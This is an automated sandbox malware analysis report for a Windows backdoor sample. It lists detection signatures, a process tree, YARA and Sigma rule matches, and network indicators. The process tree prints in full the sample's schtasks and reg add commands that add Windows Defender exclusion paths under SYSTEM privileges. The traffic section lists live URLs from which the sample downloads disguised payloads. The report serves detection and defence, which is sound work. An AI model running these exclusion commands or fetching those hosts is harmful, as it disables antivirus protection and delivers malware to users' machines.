Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
23567791246-764698008.02.exe

Overview

General Information

Sample name:23567791246-764698008.02.exe
Analysis ID:1585197
MD5:8a4c55e9db32ea50154ffaec17ea2ff7
SHA1:8fd20b312c40ae674ae5f00cba6a1792309f0182
SHA256:fa4cc6dfd5b8932c3acd2b5fb952bac9c8a9068fcceee82a5b0a1d63dd204d53
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 23567791246-764698008.02.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\23567791246-764698008.02.exe" MD5: 8A4C55E9DB32EA50154FFAEC17EA2FF7)
  • lSQb8c.exe (PID: 3772 cmdline: C:\Users\user\Documents\lSQb8c.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • lSQb8c.exe (PID: 6680 cmdline: C:\Users\user\Documents\lSQb8c.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 2356 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2548 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1080 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1964 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5304 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3692 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3928 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5148 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2920 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5032 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7132 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6624 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 768 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4760 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6980 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5448 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 3592 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 1452 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3500 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 2304 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3560 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7160 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6972 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 4404 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
5.2.lSQb8c.exe.2920000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
4.2.lSQb8c.exe.2780000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\lSQb8c.exe, ParentImage: C:\Users\user\Documents\lSQb8c.exe, ParentProcessId: 6680, ParentProcessName: lSQb8c.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 2356, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\lSQb8c.exe, ParentImage: C:\Users\user\Documents\lSQb8c.exe, ParentProcessId: 6680, ParentProcessName: lSQb8c.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 2356, ProcessName: cmd.exe
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3592, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 1452, ProcessName: reg.exe
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 1452, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 23567791246-764698008.02.exeVirustotal: Detection: 12%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.93:443 -> 192.168.2.5:49977 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F9D000.00000004.00000020.00020000.00000000.sdmp, szbGon.exe.5.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: c:\openjdk_new\build\windows-x86_64-normal-server-release\jdk\objs\javaw_objs\javaw.pdb source: 23567791246-764698008.02.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: lSQb8c.exe, 00000004.00000000.3038118717.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe, 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe, 00000005.00000002.3257745540.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe, 00000005.00000000.3057333552.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe.0.dr

Change of critical system settings

barindex
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAFA1B8 FindFirstFileExW,4_2_00007FF8BFAFA1B8
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DFFE
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDFF
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]4_2_0000000140011270
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DE96
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DEFB
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000E178
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDD9
Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0056A515 InternetReadFile,5_2_0056A515
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: yuqi7x.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: yuqi7x.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: lSQb8c.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: lSQb8c.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: lSQb8c.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: lSQb8c.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: lSQb8c.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: lSQb8c.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: lSQb8c.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: lSQb8c.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: lSQb8c.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: lSQb8c.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: lSQb8c.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: lSQb8c.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: lSQb8c.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: lSQb8c.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: lSQb8c.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: lSQb8c.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: lSQb8c.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: lSQb8c.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: lSQb8c.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: lSQb8c.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: lSQb8c.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: lSQb8c.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003v
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003IE
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/6
Source: lSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg-PC
Source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgD
Source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgW
Source: lSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
Source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000138000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg4
Source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgL
